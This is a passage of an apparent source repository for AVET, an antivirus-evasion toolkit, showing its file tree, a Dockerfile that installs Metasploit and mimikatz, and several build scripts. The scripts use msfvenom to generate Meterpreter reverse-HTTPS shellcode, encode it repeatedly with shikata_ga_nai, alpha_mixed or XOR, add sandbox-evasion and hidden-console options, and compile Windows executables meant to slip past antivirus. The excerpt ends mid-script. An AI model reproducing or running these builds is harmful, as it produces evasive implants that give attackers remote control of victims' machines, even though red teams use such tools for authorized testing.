├── CHANGELOG ├── Dockerfile ├── LICENSE ├── README.md ├── avet.py ├── banner.txt ├── build ├── build_40xshikata_revhttpsunstaged_win32.sh ├── build_50xshikata_quiet_revhttps_win32.sh ├── build_50xshikata_revhttps_win32.sh ├── build_asciimsf_fromcmd_revhttps_win32.sh ├── build_asciimsf_revhttps_win32.sh ├── build_avetenc_dynamicfromfile_revhttps_win32.sh ├── build_avetenc_fopen_revhttps_win32.sh ├── build_avetenc_mtrprtrxor_revhttps_win64.sh ├── build_calcfromcmd_50xshikata_revhttps_win32.sh ├── build_calcfrompowersh_50xshikata_revhttps_win32.sh ├── build_checkdomain_rc4_mimikatz.sh ├── build_cpucores_revhttps_win32.sh ├── build_disablewindefpsh_xorfromcmd_revhttps_win64.sh ├── build_dkmc_downloadexecshc_revhttps_win32.sh ├── build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh ├── build_downloadbitsadmin_revhttps_win32.sh ├── build_downloadcertutil_revhttps_win32.sh ├── build_downloadcurl_mtrprtrxor_revhttps_win64.sh ├── build_downloadiexplorer_revhttps_win32.sh ├── build_downloadpsh_revhttps_win32.sh ├── build_downloadsocket_mtrprtrxor_revhttps_win64.sh ├── build_downloadsocket_revhttps_win32.sh ├── build_dynamicfromfile_revhttps_win32.sh ├── build_eval_adversarial_dos.sh ├── build_eval_adversarial_extend.sh ├── build_eval_adversarial_padding.sh ├── build_eval_adversarial_shift.sh ├── build_eval_adversarial_si.sh ├── build_fibonacci_rc4_mimikatz.sh ├── build_fopen_mtrprtrxor_revhttps_win64.sh ├── build_fopen_quiet_revhttps_win32.sh ├── build_fopen_revhttps_win32.sh ├── build_getchar_rc4_mimikatz.sh ├── build_gethostbyname_revhttps_win32.sh ├── build_has_process_exit_revhttps_win32.sh ├── build_hasvmkey_revhttps_win32.sh ├── build_hasvmmac_revtcp_win32.sh ├── build_hollowing_targetfromcmd_doubleenc_doubleev_revhttps_win64.sh ├── build_hollowing_targetfromcmd_doubleenc_doubleev_revtcp_win32.sh ├── build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh ├── build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh ├── build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh ├── build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revtcp_win32.sh ├── build_kaspersky_fopen_shellrevtcp_win32.sh ├── build_mimikatz_pe2shc_xorfromcmd_win64.sh ├── build_pause_rc4_mimikatz.sh ├── build_rc4_interactive_pwsh_mimikatz_win64.sh ├── build_rc4_interactive_with_arithmetic_pwsh_mimikatz_win64.sh ├── build_rc4_mimikatz_all_evasions.sh ├── build_rc4enc_mimikatz_adversarial_win64.sh ├── build_rc4enc_mimikatz_win64.sh ├── build_sleep_rc4_mimikatz.sh ├── build_sleepbyping_rc4_mimikatz.sh ├── build_timedfibonacci_rc4_mimikatz.sh ├── buildsvc_20xshikata_bindtcp_win32.sh ├── feature_construction.sh ├── global_connect_config.sh ├── global_win32.sh └── global_win64.sh ├── build_script_tester.py ├── images └── pm.png ├── input ├── dummy.txt └── goodware_samples │ └── put_goodware_here.txt ├── output └── dummy.txt ├── requirements.txt ├── setup.sh ├── source ├── avet.c ├── avetsvc.c ├── command_exec │ ├── command_exec.assign │ └── command_exec.include ├── data_utility.h ├── debug_print │ └── debug_print.include ├── decode_payload │ ├── decode_payload.assign │ └── decode_payload.include ├── evasion │ ├── evasion.assign │ └── evasion.include ├── get_command │ ├── get_command.assign │ └── get_command.include ├── get_key │ ├── get_key.assign │ └── get_key.include ├── get_payload │ ├── get_payload.assign │ └── get_payload.include ├── get_payload_info │ ├── get_payload_info.assign │ └── get_payload_info.include ├── implementations │ ├── command_exec │ │ ├── exec_via_cmd.h │ │ ├── exec_via_powershell.h │ │ └── no_command.h │ ├── debug_print │ │ └── debug_print.h │ ├── encoding │ │ ├── avet │ │ │ ├── avet_decoder.h │ │ │ ├── avet_encoder │ │ │ └── sh_format │ │ ├── none │ │ │ └── none_decoder.h │ │ ├── rc4 │ │ │ ├── rc4.h │ │ │ ├── rc4_decoder.h │ │ │ ├── rc4_encoder │ │ │ └── rc4_encoder.c │ │ └── xor │ │ │ ├── xor_decoder.h │ │ │ ├── xor_encoder │ │ │ └── xor_encoder.c │ ├── evasion │ │ ├── check_fast_forwarding.h │ │ ├── computation_fibonacci.h │ │ ├── computation_timed_fibonacci.h │ │ ├── evasion_by_sleep.h │ │ ├── fopen_sandbox_evasion.h │ │ ├── get_bios_info.h │ │ ├── get_computer_domain.h │ │ ├── get_cpu_cores.h │ │ ├── get_eventlog.h │ │ ├── get_install_date.h │ │ ├── get_num_processes.h │ │ ├── get_registry_size.h │ │ ├── get_standard_browser.h │ │ ├── get_tickcount.h │ │ ├── get_usb.h │ │ ├── gethostbyname_sandbox_evasion.h │ │ ├── has_background_wp.h │ │ ├── has_folder.h │ │ ├── has_network_drive.h │ │ ├── has_process_exit.h │ │ ├── has_public_desktop.h │ │ ├── has_recent_files.h │ │ ├── has_recycle_bin.h │ │ ├── has_username.h │ │ ├── has_vm_mac.h │ │ ├── has_vm_regkey.h │ │ ├── hide_console.h │ │ ├── interaction_getchar.h │ │ ├── interaction_msg_box.h │ │ ├── interaction_system_pause.h │ │ ├── is_debugger_present.h │ │ └── sleep_by_ping.h │ ├── gen_adversarial_exe │ │ ├── genetic_optimizer.py │ │ ├── malconv │ │ │ ├── __init__.py │ │ │ ├── malconv.py │ │ │ └── pretrained_malconv.pth │ │ └── practical_manipulations │ │ │ ├── __init__.py │ │ │ ├── extend.py │ │ │ ├── full_dos.py │ │ │ ├── padding.py │ │ │ ├── partial_dos.py │ │ │ ├── section_injection.py │ │ │ └── shift.py │ ├── payload_execution_method │ │ ├── exec_shellcode.h │ │ ├── exec_shellcode64.h │ │ ├── exec_shellcode_ASCIIMSF.h │ │ ├── helper_functions │ │ │ ├── helper_functions.h │ │ │ └── helper_functions64.h │ │ ├── hollowing32.h │ │ ├── hollowing64.h │ │ ├── inject_dll.h │ │ └── inject_shellcode.h │ └── retrieve_data │ │ ├── download_bitsadmin.h │ │ ├── download_certutil.h │ │ ├── download_curl.h │ │ ├── download_internet_explorer.h │ │ ├── download_powershell.h │ │ ├── download_socket.h │ │ ├── dynamic_from_file.h │ │ ├── from_command_line_hex.h │ │ ├── from_command_line_raw.h │ │ ├── helper_functions │ │ └── helper_functions.h │ │ ├── no_data.h │ │ ├── static_from_file.h │ │ └── static_from_here.h ├── payload_execution_method │ ├── payload_execution_method.assign │ └── payload_execution_method.include └── static_data │ └── static_data.include ├── test_payloads └── exec_calc.c └── tools ├── data_raw_to_c ├── data_raw_to_c └── data_raw_to_c.c ├── generate_key ├── generate_key └── generate_key.c └── sh_format ├── sh_format └── sh_format.c /Dockerfile: -------------------------------------------------------------------------------- 1 | # v0.1 2 | # 3 | # This Dockerfile encapsulates the Metasploit Framework and Avet. 4 | # 5 | # Also included: 6 | # hasherezade/pe_to_shellcode 7 | # Mr-Un1k0d3r/DKMC 8 | # gentilkiwi/mimikatz 9 | # 10 | # To build this run: 11 | # $ sudo docker build -t avet:v0.1 . 12 | # 13 | # To start this: 14 | # $ sudo docker run -it --net=host --env="DISPLAY" --volume="$HOME/.Xauthority:/root/.Xauthority:rw" -v $(pwd):/tools/avet/output avet:v0.1 /bin/bash 15 | # (alias this) 16 | # 17 | # This mounts the Current Working directory as a Docker Volume and attach it to /avet/output. 18 | # To be save, choose an empty directory to prevent overriding files. 19 | # 20 | # Right now, the only option to configure the build scripts inside the Container 21 | # is using avet.py or with vim/nano/gedit in /avet/build 22 | # You can also install other editors if you like 23 | # 24 | 25 | 26 | FROM debian:buster 27 | 28 | # Preparation 29 | ARG DEBIAN_FRONTEND=noninteractive 30 | 31 | RUN dpkg --add-architecture i386 && apt-get update && apt-get install -y \ 32 | wget \ 33 | curl \ 34 | git \ 35 | unzip \ 36 | jq \ 37 | apt-utils \ 38 | gnupg2 \ 39 | vim \ 40 | nano \ 41 | gedit \ 42 | wine \ 43 | wine32 \ 44 | python \ 45 | python3 \ 46 | mingw-w64 \ 47 | && rm -rf /var/lib/apt/lists/* 48 | 49 | 50 | # For metasploit 51 | RUN echo 'deb http://apt.metasploit.com/ buster main' > /etc/apt/sources.list.d/metasploit-framework.list 52 | RUN wget -O - http://apt.metasploit.com/metasploit-framework.gpg.key | apt-key add - 53 | 54 | RUN apt-get update && apt-get install -y \ 55 | metasploit-framework \ 56 | && rm -rf /var/lib/apt/lists/* 57 | 58 | 59 | # For avet 60 | WORKDIR /tools/avet 61 | COPY . . 62 | 63 | 64 | # For pe2shc 65 | WORKDIR /tools/pe_to_shellcode 66 | RUN curl -s https://api.github.com/repos/hasherezade/pe_to_shellcode/releases/latest \ 67 | | jq -r '.assets[].browser_download_url' \ 68 | | grep 'pe2shc' \ 69 | | wget -i - 70 | 71 | 72 | # For mimikatz 73 | WORKDIR /tools/mimikatz 74 | RUN curl -s https://api.github.com/repos/gentilkiwi/mimikatz/releases/latest \ 75 | | jq -r '.assets[].browser_download_url' \ 76 | | grep .'zip' \ 77 | | wget -i - \ 78 | && unzip mimikatz_trunk.zip \ 79 | && cp x64/mimikatz.exe /tools/avet/input 80 | 81 | 82 | # For dkmc 83 | WORKDIR /tools 84 | RUN git clone https://github.com/Mr-Un1k0d3r/DKMC.git 85 | 86 | 87 | # configure wine during build 88 | RUN winecfg 89 | 90 | 91 | WORKDIR /tools/avet 92 | -------------------------------------------------------------------------------- /banner.txt: -------------------------------------------------------------------------------- 1 | *** ============================================= *** 2 | 3 | .==,_ 4 | .===,_`\\ 5 | .====,_ ` \\ .====,__ 6 | --- .==-,`~. \\ `:`.__, 7 | --- `~~=-. \\ /^^^ MEEP MEEP 8 | --- `~~=. \\ / 9 | `~. \\ / 10 | ~. \\____./ 11 | `.=====) 12 | ___.--~~~--.__ 13 | ___\\.--~~~ ~~~---.._|/ 14 | ~~~\\\" / 15 | 16 | ________ ___ ___ _____ __________ 17 | |\ __ \|\ \ / /|\ __\ |\___ __\ 18 | \ \ \|\ \ \ \ / / | \ \__ \|__|\ \_| 19 | \ \ __ \ \ \/ / / \ \ _\ \ \ \ 20 | \ \ \ \ \ \ / / \ \ \___ \ \ \ 21 | \ \__\ \__\ \__/ / \ \____\ \ \__\ 22 | \|__|\|__|\|__|/ \|_____| \|__| 23 | 24 | *** ============================================= *** 25 | 26 | -------------------------------------------------------------------------------- /build/build_40xshikata_revhttpsunstaged_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Use unstaged meterpreter payload and apply shikata 40 times. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # import feature construction interface 13 | . build/feature_construction.sh 14 | 15 | # import global default lhost and lport values from build/global_connect_config.sh 16 | . build/global_connect_config.sh 17 | 18 | # include script containing the compiler var $win32_compiler 19 | # you can edit the compiler in build/global_win32.sh 20 | # or enter $win32_compiler="mycompiler" here 21 | . build/global_win32.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # don't enable debug output because printing the whole unstaged payload takes a lot of time 32 | # enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter unstaged reverse payload, encoded 40 rounds with shikata_ga_nai 37 | msfvenom -p windows/meterpreter_reverse_https lhost=$LHOST lport=$LPORT extensions=stdapi,priv -e x86/shikata_ga_nai -i 40 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # set shellcode source 40 | set_payload_source static_from_file input/sc_c.txt 41 | 42 | # set decoder and key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # compile to exe file 53 | $win32_compiler -o output/40xshikata_revhttpsunstaged_win32.exe source/avet.c 54 | strip output/40xshikata_revhttpsunstaged_win32.exe 55 | 56 | # cleanup 57 | cleanup_techniques 58 | 59 | 60 | echo " 61 | # Execute the following command: 62 | # $ 40xshikata_revhttpsunstaged_win32.exe 63 | " 64 | -------------------------------------------------------------------------------- /build/build_50xshikata_quiet_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata 50 times and hide console window. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded 50 rounds with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 50 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # quiet execution / hide console window 40 | add_evasion hide_console 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | set_decoder none 47 | set_key_source no_data 48 | 49 | # set payload info source 50 | set_payload_info_source no_data 51 | 52 | # set shellcode binding technique 53 | set_payload_execution_method exec_shellcode 54 | 55 | # compile to exe file 56 | $win32_compiler -o output/50xshikata_quiet_revhttps_win32.exe source/avet.c 57 | strip output/50xshikata_quiet_revhttps_win32.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # Execute the following command: 65 | # $ 50xshikata_quiet_revhttps_win32.exe 66 | " 67 | -------------------------------------------------------------------------------- /build/build_50xshikata_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata 50 times. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded 50 rounds with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 50 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # set shellcode source 40 | set_payload_source static_from_file input/sc_c.txt 41 | 42 | # set decoder and crypto key source 43 | set_decoder none 44 | set_key_source no_data 45 | 46 | # set payload info source 47 | set_payload_info_source no_data 48 | 49 | # set shellcode binding technique 50 | set_payload_execution_method exec_shellcode 51 | 52 | # enable debug output 53 | enable_debug_print 54 | 55 | # compile to exe file 56 | $win32_compiler -o output/50xshikata_revhttps_win32.exe source/avet.c 57 | strip output/50xshikata_revhttps_win32.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | echo " 63 | # Execute the following command: 64 | # $ 50xshikata_revhttps_win32.exe 65 | " 66 | -------------------------------------------------------------------------------- /build/build_asciimsf_fromcmd_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Call the generated output.exe on target, 6 | # delivering the shellcode string in output/alpha_mixed.txt as command line argument 7 | #DESCRIPTION_END 8 | 9 | 10 | # print AVET logo 11 | cat banner.txt 12 | 13 | # include script containing the compiler var $win32_compiler 14 | # you can edit the compiler in build/global_win32.sh 15 | # or enter $win32_compiler="mycompiler" here 16 | . build/global_win32.sh 17 | 18 | # import feature construction interface 19 | . build/feature_construction.sh 20 | 21 | # import global default lhost and lport values from build/global_connect_config.sh 22 | . build/global_connect_config.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # override connect-back settings here, if necessary 27 | LPORT=$GLOBAL_LPORT 28 | LHOST=$GLOBAL_LHOST 29 | # no command preexec 30 | set_command_source no_data 31 | set_command_exec no_command 32 | # enable debug output 33 | enable_debug_print 34 | #CONFIGURATION_END 35 | 36 | 37 | # make meterpreter reverse payload, encoded with msf alpha_mixed 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/alpha_mixed BufferRegister=EAX -a x86 --platform Windows -f raw > output/sc_alpha_mixed.txt 39 | 40 | # set shellcode source 41 | set_payload_source from_command_line_raw 42 | 43 | # set decoder and key source 44 | set_decoder none 45 | set_key_source no_data 46 | 47 | # set payload info source 48 | set_payload_info_source no_data 49 | 50 | # set shellcode binding technique 51 | set_payload_execution_method exec_shellcode_ASCIIMSF 52 | 53 | # compile to exe file 54 | $win32_compiler -ffixed-eax -o output/asciimsf_fromcmd_revhttps_win32.exe source/avet.c 55 | strip output/asciimsf_fromcmd_revhttps_win32.exe 56 | 57 | # cleanup 58 | cleanup_techniques 59 | 60 | 61 | echo " 62 | # Call the generated .exe on target delivering the shellcode string in output/sc_alpha_mixed.txt as command line argument: 63 | # $ asciimsf_fromcmd_revhttps_win32.exe sc_alpha_mixed.txt 64 | " 65 | -------------------------------------------------------------------------------- /build/build_asciimsf_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Use metasploits alpha_mixed encoding 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug printing 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with msf alpha_mixed 37 | # additionaly to the avet encoder, further encoding should be used 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/alpha_mixed -f c -a x86 --platform Windows > input/sc_c.txt 39 | 40 | # add fopen sandbox evasion 41 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 42 | 43 | # set shellcode source 44 | set_payload_source static_from_file input/sc_c.txt 45 | 46 | # set decoder and key source 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode_ASCIIMSF 55 | 56 | # compile to exe file 57 | $win32_compiler -o output/asciimsf_revhttps_win32.exe source/avet.c 58 | strip output/asciimsf_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ asciimsf_revhttps_win32.exe 67 | " 68 | -------------------------------------------------------------------------------- /build/build_avetenc_dynamicfromfile_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # build the .exe file that loads the payload from a given text file 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | # additionally to the avet encoder, further encoding should be used 38 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 39 | 40 | # Apply AVET encoding via format.sh tool 41 | encode_payload avet input/sc_c.txt output/scenc_raw.txt 42 | 43 | # set shellcode source 44 | set_payload_source dynamic_from_file 45 | 46 | # set decoder and key source 47 | # AVET decoder requires no key 48 | set_decoder avet 49 | set_key_source no_data 50 | 51 | # set payload info source 52 | set_payload_info_source no_data 53 | 54 | # set shellcode binding technique 55 | set_payload_execution_method exec_shellcode 56 | 57 | # compile to exe file 58 | $win32_compiler -o output/avetenc_dynamicfromfile_revhttps_win32.exe source/avet.c 59 | strip output/avetenc_dynamicfromfile_revhttps_win32.exe 60 | 61 | # cleanup 62 | cleanup_techniques 63 | 64 | 65 | echo " 66 | # Call the generated executable like: 67 | # $ avetenc_dynamicfromfile_revhttps_win32.exe scenc_raw.txt 68 | " 69 | -------------------------------------------------------------------------------- /build/build_avetenc_fopen_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Use AVET encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # encode the shellcode via AVET encoding. 40 | encode_payload avet input/sc_c.txt input/scenc_raw.txt 41 | 42 | # add fopen sandbox evasion 43 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 44 | 45 | # convert encoded shellcode file to c array style for static include 46 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 47 | 48 | # set shellcode source 49 | set_payload_source static_from_file input/scenc_c.txt 50 | 51 | # set decoder and key source 52 | # AVET decoder needs no key 53 | set_decoder avet 54 | set_key_source no_data 55 | 56 | # set payload info source 57 | set_payload_info_source no_data 58 | 59 | # set shellcode binding technique 60 | set_payload_execution_method exec_shellcode 61 | 62 | # compile to exe file 63 | $win32_compiler -o output/avetenc_fopen_revhttps_win32.exe source/avet.c 64 | strip output/avetenc_fopen_revhttps_win32.exe 65 | 66 | # cleanup 67 | cleanup_techniques 68 | 69 | 70 | echo " 71 | # Execute the following command: 72 | # $ avetenc_fopen_revhttps_win32.exe 73 | " 74 | -------------------------------------------------------------------------------- /build/build_avetenc_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Execute 64-bit shellcode. 6 | # Uses XOR encoder from metasploit, as well as AVET encoding. 7 | #DESCRIPTION_END 8 | 9 | 10 | # print AVET logo 11 | cat banner.txt 12 | 13 | # include script containing the compiler var $win64_compiler 14 | # you can edit the compiler in build/global_win64.sh 15 | # or enter $win64_compiler="mycompiler" here 16 | . build/global_win64.sh 17 | 18 | # import feature construction interface 19 | . build/feature_construction.sh 20 | 21 | # import global default lhost and lport values from build/global_connect_config.sh 22 | . build/global_connect_config.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # override connect-back settings here, if necessary 27 | LPORT=$GLOBAL_LPORT 28 | LHOST=$GLOBAL_LHOST 29 | # no command preexec 30 | set_command_source no_data 31 | set_command_exec no_command 32 | # enable debug output 33 | enable_debug_print 34 | #CONFIGURATION_END 35 | 36 | 37 | # make meterpreter reverse payload 38 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -f c --platform Windows > input/sc_c.txt 39 | 40 | # Apply AVET encoding 41 | encode_payload avet input/sc_c.txt input/scenc_raw.txt 42 | 43 | # convert to c array format for static include 44 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 45 | 46 | # set shellcode source 47 | set_payload_source static_from_file input/scenc_c.txt 48 | 49 | # set decoder and key source 50 | # AVET decoder requires no key 51 | set_decoder avet 52 | set_key_source no_data 53 | 54 | # set payload info source 55 | set_payload_info_source no_data 56 | 57 | # set shellcode binding technique 58 | set_payload_execution_method exec_shellcode64 59 | 60 | # call make_avet, compile 61 | $win64_compiler -o output/avetenc_mtrprtrxor_revhttps_win64.exe source/avet.c 62 | strip output/avetenc_mtrprtrxor_revhttps_win64.exe 63 | 64 | # cleanup 65 | cleanup_techniques 66 | 67 | 68 | echo " 69 | # Execute the following command: 70 | # $ avetenc_mtrprtrxor_revhttps_win64.exe 71 | " 72 | -------------------------------------------------------------------------------- /build/build_calcfromcmd_50xshikata_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata 50 times. 6 | # Preexecute calc.exe before actual payload. 7 | #DESCRIPTION_END 8 | 9 | 10 | # print AVET logo 11 | cat banner.txt 12 | 13 | # include script containing the compiler var $win32_compiler 14 | # you can edit the compiler in build/global_win32.sh 15 | # or enter $win32_compiler="mycompiler" here 16 | . build/global_win32.sh 17 | 18 | # import feature construction interface 19 | . build/feature_construction.sh 20 | 21 | # import global default lhost and lport values from build/global_connect_config.sh 22 | . build/global_connect_config.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # override connect-back settings here, if necessary 27 | LPORT=$GLOBAL_LPORT 28 | LHOST=$GLOBAL_LHOST 29 | # enable debug output 30 | enable_debug_print 31 | #CONFIGURATION_END 32 | 33 | 34 | # make meterpreter reverse payload, encoded 50 rounds with shikata_ga_nai 35 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 50 -f c -a x86 --platform Windows > input/sc_c.txt 36 | 37 | # set command source 38 | set_command_source static_from_here "calc.exe" 39 | 40 | # set command execution method 41 | set_command_exec exec_via_cmd 42 | 43 | # set shellcode source 44 | set_payload_source static_from_file input/sc_c.txt 45 | 46 | # set decoder and crypto key source 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # compile to exe file 57 | $win32_compiler -o output/calcfromcmd_50xshikata_revhttps_win32.exe source/avet.c 58 | strip output/calcfromcmd_50xshikata_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ calcfromcmd_50xshikata_revhttps_win32.exe 67 | " 68 | -------------------------------------------------------------------------------- /build/build_calcfrompowersh_50xshikata_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata 50 times. 6 | # Preexecute calc.exe via powershell before actual payload. 7 | #DESCRIPTION_END 8 | 9 | 10 | # print AVET logo 11 | cat banner.txt 12 | 13 | # include script containing the compiler var $win32_compiler 14 | # you can edit the compiler in build/global_win32.sh 15 | # or enter $win32_compiler="mycompiler" here 16 | . build/global_win32.sh 17 | 18 | # import feature construction interface 19 | . build/feature_construction.sh 20 | 21 | # import global default lhost and lport values from build/global_connect_config.sh 22 | . build/global_connect_config.sh 23 | 24 | 25 | #CONFIGURATION_START 26 | # override connect-back settings here, if necessary 27 | LPORT=$GLOBAL_LPORT 28 | LHOST=$GLOBAL_LHOST 29 | # enable debug output 30 | enable_debug_print 31 | #CONFIGURATION_END 32 | 33 | 34 | # make meterpreter reverse payload, encoded 50 rounds with shikata_ga_nai 35 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 50 -f c -a x86 --platform Windows > input/sc_c.txt 36 | 37 | # set command source 38 | set_command_source static_from_here "calc.exe" 39 | 40 | # set command execution method 41 | set_command_exec exec_via_powershell 42 | 43 | # set shellcode source 44 | set_payload_source static_from_file input/sc_c.txt 45 | 46 | # set decoder and 